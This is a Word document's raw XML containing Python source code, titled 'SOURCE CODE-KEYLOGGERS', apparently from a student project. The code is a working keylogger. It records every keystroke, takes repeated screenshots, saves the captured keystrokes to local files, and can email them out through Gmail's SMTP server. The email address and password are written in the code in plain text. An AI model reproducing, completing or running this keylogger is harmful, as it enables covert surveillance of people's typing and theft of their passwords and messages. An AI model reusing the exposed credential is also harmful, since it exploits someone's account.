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F3264" w14:textId="07984740" w:rsidR="007B07BE" w:rsidRDefault="00112C82" w:rsidP="00112C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SOURCE CODE-KEYLOGGERS(</w:t>
      </w:r>
      <w:r w:rsidR="00210104">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>FILE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6E6FFFA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import keyboard </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F6F8AD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import smtplib </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAF0366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>from threading import Timer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04225852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>from datetime import datetime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A2E36F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>import pyscreenshot as ImageGrab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FBE227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>import schedule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D033999" w14:textId="731295AB" w:rsid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>import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B04AD65" w14:textId="6D7CC14C" w:rsid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</w:p>
    <w:p w14:paraId="4A47B8D3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>SEND_REPORT_EVERY = 5 # in seconds, 60 means 1 minute and so on</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8A4853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>EMAIL_ADDRESS = "pvaatheesh@gmail.com"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661076FE" w14:textId="0BE1AFBA" w:rsid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>EMAIL_PASSWORD = "htcb hwro rnrc kamh"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1F17F5" w14:textId="7FE70457" w:rsid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</w:p>
    <w:p w14:paraId="3DD6EE66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>class Keylogger:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7984A6FA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def __init_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_(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self, interval,take_screenshot,report_method="email"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7106C28C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we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gonna pass SEND_REPORT_EVERY to interval</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B626D45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self.interval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= interval</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A06C602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self.report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_method = report_method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E721AD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is the string variable that contains the log of all </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E03D9DD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the keystrokes within `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self.interval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`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C9E268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self.log = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFF71A4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record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start &amp; end datetimes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B793D2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self.start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_dt = datetime.now()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAEA0DA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self.end_dt =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datetime.now(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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5DA28F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'''def start(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F324035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record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the start datetime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D61FA0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self.start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_dt = datetime.now()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228805F5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lastRenderedPageBreak/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start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the keylogger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575950C2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keyboard.on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_release(callback=self.callback)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187C0AA1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start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reporting the keylogs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B08865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self.report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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346D7697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self.take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_screenshot()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666B47E9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block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the current thread, wait until CTRL+C is pressed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB2934E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keyboard.wait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()'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C9F320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callback(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self, event):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4380D9A8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"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412AE35D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This callback is invoked whenever a keyboard event is occured</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25613EC1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(i.e when a key is released in this example)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB12F08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"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E66133C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name = event.name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFCA9A7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if len(name) &gt; 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0405691A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not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a character, special key (e.g ctrl, alt, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9DC09E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uppercase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with []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F353C0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if name == "space":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E0CB3C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    # " " instead of "space"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE19881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    name = " "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A499A8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elif name == "enter":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA78131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add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a new line whenever an ENTER is pressed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1439BA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    name = "[ENTER]\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F7510B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elif name == "decimal":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12ECB684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    name = "."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E229D2D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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F49C2B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replace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spaces with underscores</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3317E8C6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    name =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name.replace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(" ", "_")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3749D4E3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lastRenderedPageBreak/>
        <w:t xml:space="preserve">                name = f"[{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name.upper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()}]"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2678E3F4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finally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, add the key name to our global `self.log` variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CDD92B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self.log += name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2210EBB6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def report(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2F7B95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"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA4F47E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This function gets called every `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self.interval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`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19447F3C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It basically sends keylogs and resets `self.log` variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D1E534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"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5652F5DF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if self.log:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AF6120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there is something in log, report it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2DDECB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self.end_dt =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datetime.now(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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C8E73E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# update `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self.filename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`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265BF2AB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self.update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_filename()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307945FD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if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self.report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_method == "email":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377ED9C5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self.sendmail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(EMAIL_ADDRESS, EMAIL_PASSWORD, self.log)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187532C2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elif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self.report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_method == "file":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63290E4C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self.report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_to_file()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391660F0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you want to print in the console, uncomment below line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A919D2C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# print(f"[{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self.filename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}] - {self.log}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F476D7D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self.start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_dt = datetime.now()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62401958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self.log = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50192301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timer =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Timer(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interval=self.interval, function=self.report)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F60B5A0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set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the thread as daemon (dies when main thread die)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C24BA47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timer.daemon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= True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580B1912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start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the timer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCDBB4E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self.take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_screenshot()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B976B2A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timer.start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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF6FD34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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    def update_filename(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305C90A7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construct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the filename to be identified by start &amp; end datetimes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A262B8F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start_dt_str = str(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self.start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_dt)[:-7].replace(" ", "-").replace(":", "")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5562056F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end_dt_str = str(self.end_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dt)[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:-7].replace(" ", "-").replace(":", "")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C775029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self.filename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= f"keylog-{start_dt_str}_{end_dt_str}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784B10C1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def report_to_file(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CEB079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"""This method creates a log file in the current directory that contains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E55159A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the current keylogs in the `self.log` variable"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212ABAB2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open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the file in write mode (create it)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F48FAFA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with open(f"{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self.filename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}.txt", "w") as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD1517E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write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the keylogs to the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52300E3D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self.log, file=f)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189F0E3C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print(f"[+] Saved {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self.filename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}.txt")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F1BFA2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def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sendmail(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self, email, password, message):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D51674B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manages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a connection to the SMTP server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F47FFD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server =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smtplib.SMTP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(host="smtp.gmail.com", port=587)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDEDB49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connect to the SMTP server as TLS mode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( for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security )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8F5935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server.starttls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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325E305B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login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to the email account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6271CE53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server.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login(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email, password)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430539FE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send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the actual message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8E9812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server.sendmail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(email, email, message)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6CB95E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terminates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the session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651001EB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server.quit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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32268C1C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def take_screenshot(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD9CBB1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"Taking screenshot....")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D67FDA6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self.now=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datetime.now(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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597A938F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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        dt_string =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self.now.strftime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("%d-%m-%Y %H-%M-%S")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7BAF03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image_name=f"screenshot-{str(dt_string)}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F5ECAA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screenshot=ImageGrab.grab()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A852925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filepath=f"D:/2nd year/{image_name}.png"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11886628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screenshot.save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(filepath)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C3CDB8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"Screenshot taken.... ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB7E6BB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return filepath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1B7A70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def start(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1534E0C0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record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the start datetime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289ED2DC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self.start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_dt = datetime.now()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700C02BB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start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the keylogger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D1C4B6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keyboard.on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_release(callback=self.callback)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6574287F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self.take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_screenshot()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34427AB0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start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reporting the keylogs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756970A6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self.report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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9E8500" w14:textId="2ECC7AB4" w:rsid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keyboard.wait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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758C0515" w14:textId="17ABF197" w:rsid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</w:p>
    <w:p w14:paraId="4D2DF1EE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>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A71558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you want a keylogger to send to your email</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EAC1AA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# keylogger =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Keylogger(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interval=SEND_REPORT_EVERY, report_method="email")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0314516E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#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 xml:space="preserve"> you want a keylogger to record keylogs to a local file </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D84A50E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# (and then send it using your favorite method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BCEE7D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keylogger = Keylogger(interval=SEND_REPORT_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EVERY,take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_screenshot="filepath",report_method="file")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F15EC86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#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schedule.every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(5).seconds.do(keylogger.take_screenshot)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071FDCF3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while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6C0AF3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schedule.every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(5).seconds.do(keylogger.take_screenshot)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07ED00B8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schedule.run_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pending(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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4150D0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#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keylogger.take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_screenshot()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C5F75B" w14:textId="77777777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time.sleep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(2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5FE42E" w14:textId="13AF35F4" w:rsidR="00112C82" w:rsidRPr="00112C82" w:rsidRDefault="00112C82" w:rsidP="00112C82">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112C8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112C82">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>keylogger.start</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00112C82">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00112C82" w:rsidRPr="00112C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82"/>
    <w:rsid w:val="00112C82"/>
    <w:rsid w:val="00160548"/>
    <w:rsid w:val="00210104"/>
    <w:rsid w:val="007B0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8158C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{52EEB15E-EF78-4D78-AB17-73CEEE387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826</Words>
  <Characters>4712</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>39</Lines>
  <Paragraphs>11</Paragraphs>
  <ScaleCrop>false</ScaleCrop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</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>p</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-06-08T06:41:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-06-08T06:44:00Z</dcterms:modified>
</cp:coreProperties>
</file>